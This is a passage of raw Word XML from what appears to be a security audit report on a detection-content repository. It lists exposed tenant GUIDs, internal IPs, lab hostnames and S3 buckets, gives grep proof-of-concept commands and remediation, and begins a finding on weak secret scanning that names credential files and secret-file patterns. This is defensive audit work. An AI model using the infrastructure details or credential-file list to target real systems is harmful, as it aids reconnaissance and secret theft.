          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>azure_audit_create_or_update_an_azure_automation_*.yml:114/115/122</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0e8108b1-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IdP entityID (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_cloudtrail_updatesamlprovider.yml:109</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); O365 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OrganizationId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>75243ab2-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>e17879dd-…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>o365_mailitemsaccessed.yml:90</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>o365_modifyfolderpermissions.yml:108</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); Duo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>akey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cisco_duo_activity.yml:46</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internal appliance URLs in playbooks: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://10.1.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_indicators.json:1503,1510,2679,2686,3040,3047</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://192.168.0.245/#/binary/…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://10.1.16.170/#/binary/…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>malware_hunt_and_contain.json:4834-4835, 4874-4876, 5516-5517, 5556-5558</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10.1.19.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CrowdStrike_OAuth_API_Endpoint_Analysis.py:421-422</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab/estate hostnames: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ar-win-dc.attackrange.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (25×), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip-192-168-89-64.us-west-2.compute.internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip-10-0-10-253.us-west-2.compute.internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip-172-16-0-50.us-east-2.compute.internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (cisco_isovalent samples), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>adfs.attackrange.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cert, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>system.enterpriseservices.internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/endpoint/windows_powershell_add_module_to_global_assembly_cache.yml:9,13</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Splunk endpoints: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://securitycontent.scs.splunk.com/response_templates/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.github/workflows/response_templates/template_script.py:144</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, "playground endpoint"), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blueridge.splunkcloud.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>test.splunkcloud.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mcopenapi_public.yml:18,1295,3985</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – public doc examples), S3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>attack-range-appbinaries.s3.us-west-2.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (40 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hardcoded_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml:37-262</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>security-content.s3.us-west-2.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> None of these are secrets; Entra tenant IDs are even discoverable from a domain name. Collectively they map STRT's cloud estate (which Entra tenants/subscriptions/automation accounts exist, which S3 buckets and SCS endpoint CI depends on, which private ranges and host-naming scheme the range uses) and lower attacker cost for SEC-03/05 reconnaissance. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hardcoded_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> S3 downloads are additionally a supply-chain surface (CI installs 40 TAs from a team-owned bucket over HTTPS with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no checksum/signature verification</w:t>
      </w:r>
      <w:r>
        <w:t>); that belongs to the CI reviewer and is only noted here as data exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> disclosure only. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -rnoiE '"tenant_?id": *"[0-9a-f-]{36}"' data_sources | awk -F: '{print $NF}' | sort -u | wc -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> distinct real-looking tenant GUIDs; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -c attack-range-appbinaries contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> apply the documentation-value rewrite from SEC-05 to GUIDs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>00000000-0000-0000-0000-00000000000N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), export playbooks without run data, replace private console URLs with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://cb.example.internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, change </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>template_script.py:144</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> default to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://example.com/response_templates/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and pass the real prefix from the workflow, and publish SHA-256 sums (or a signed manifest) next to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hardcoded_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> artefacts and verify them in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng install</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-200, CWE-540, CWE-494 (unverified download note); OWASP A02, A05, A08; ASVS 14.2.x, 14.3.3; ATT&amp;CK T1590 (Gather Victim Network Information), T1580, T1195.002; NIST SP 800-53r5 SC-28, SA-11, SR-4, SI-7; NIST CSF 2.0 PR.DS-01, GV.SC-07; ISO/IEC 27001:2022 A.8.24, A.8.12, A.5.21; SANS Data Protection / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-200 Exposure of Sensitive Information to an Unauthorized Actor (2024 CWE Top 25 #17); CWE-540 Inclusion of Sensitive Information in Source Code; CWE-494 Download of Code Without Integrity Check. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A02:2021 Cryptographic Failures, A05:2021 Security Misconfiguration, A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1590, T1580, T1195.002 Supply Chain Compromise: Compromise Software Supply Chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-28 Protection of Information at Rest, SA-11 Developer Testing and Evaluation, SR-4 Provenance, SI-7 Software, Firmware, and Information Integrity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security, GV.SC Govern - Cybersecurity Supply Chain Risk Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.24 Use of cryptography, A.8.12 Data leakage prevention, A.5.21 Managing information security in the ICT supply chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets / Data Protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SEC-08 — Secret-prevention controls are weak: no scanner in CI, inert pre-commit hook, incomplete .gitignore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (no CVSS score (informational)). Exploitability: Control gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .pre-commit-config.yaml:8-10; .github/workflows/*.yml; .gitignore:1-142</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Low (process/control gap; CVSS not applicable – nominal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.pre-commit-config.yaml:8-10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.github/workflows/*.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (no gitleaks/trufflehog/detect-secrets step in any of the 9 workflows); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitignore:1-142</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; absence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitleaks.toml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.secrets.baseline</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .pre-commit-config.yaml</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8      - id: detect-aws-credentials</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9        args: ['--allow-missing-credentials']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>10      - id: detect-private-key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detect-aws-credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only looks for *the specific secret values found in the committer's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>~/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*; with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--allow-missing-credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it silently passes when that file is absent (CI and most contributors), and it never matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AKIA…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDs – hence none of the 49 committed key IDs were ever caught. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detect-private-key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> covers only PEM headers. pre-commit is opt-in on developer machines and is not executed by any workflow (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml-validation.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> runs yamlfmt/field-order only). No gitleaks/detect-secrets step exists; there is no baseline/allow-list for the legitimate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AKIAIOSFODNN7EXAMPLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> samples; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not exclude </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.pem *.key *.p12 *.pfx id_rsa* .aws/ .netrc *.secret</w:t>
      </w:r>
      <w:r>
